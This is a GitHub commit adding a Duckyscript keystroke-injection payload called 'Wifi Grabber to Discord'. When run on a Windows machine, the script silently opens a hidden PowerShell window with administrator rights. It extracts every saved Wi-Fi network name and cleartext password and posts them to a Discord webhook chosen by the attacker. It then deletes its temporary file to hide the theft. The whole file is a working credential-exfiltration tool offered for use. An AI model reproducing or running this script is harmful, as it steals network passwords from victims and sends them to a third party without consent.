Add files via upload

This commit is contained in:
beigeworm
2023-07-03 15:41:22 +00:00
committed by GitHub
parent 5b57293750
commit 2f41a34f6d

View File

@@ -0,0 +1,31 @@
REM Title: Wifi Grabber to Discord
REM Author: @beigeworm
REM Description: Uses Powershell to gather Wifi info and send it via Discord.
REM Target: Windows 10
REM *SETUP*
REM replace YOUR_WEBHOOK_HERE with your discord webhook.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove -W Hidden to show the window)
GUI r
DELAY 750
STRING powershell -NoP -NonI -W Hidden -Exec Bypass
CTRL-SHIFT ENTER
DELAY 1500
ALT y
DELAY 4000
STRING $whuri = "YOUR_WEBHOOK_HERE"
STRING ; $outfile="";$a=0;$ws=(netsh wlan show profiles) -replace ".*:\s+";foreach($s in $ws){
STRING ; if($a -gt 1 -And $s -NotMatch " policy " -And $s -ne "User profiles" -And $s -NotMatch "-----" -And $s -NotMatch "<None>" -And $s.length -gt 5){$ssid=$s.Trim();if($s -Match ":"){$ssid=$s.Split(":")[1].Trim()}
STRING ; $pw=(netsh wlan show profiles name=$ssid key=clear);$pass="None";foreach($p in $pw){if($p -Match "Key Content"){$pass=$p.Split(":")[1].Trim();$outfile+="SSID: $ssid : Password: $pass`n"}}}$a++;}
STRING ; $outfile | Out-File -FilePath "$env:temp\info.txt" -Encoding ASCII -Append; $Pathsys = "$env:temp\info.txt"; $msgsys = Get-Content -Path $Pathsys -Raw
STRING ; $escmsgsys = $msgsys -replace '[&<>]', {$args[0].Value.Replace('&', '&amp;').Replace('<', '&lt;').Replace('>', '&gt;')}
STRING ; $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = $escmsgsys} | ConvertTo-Json
STRING ; Start-Sleep 1; Invoke-RestMethod -Uri $whuri -Method Post -ContentType "application/json" -Body $jsonsys; Remove-Item -Path $Pathsys -force;exit
DELAY 500
ENTER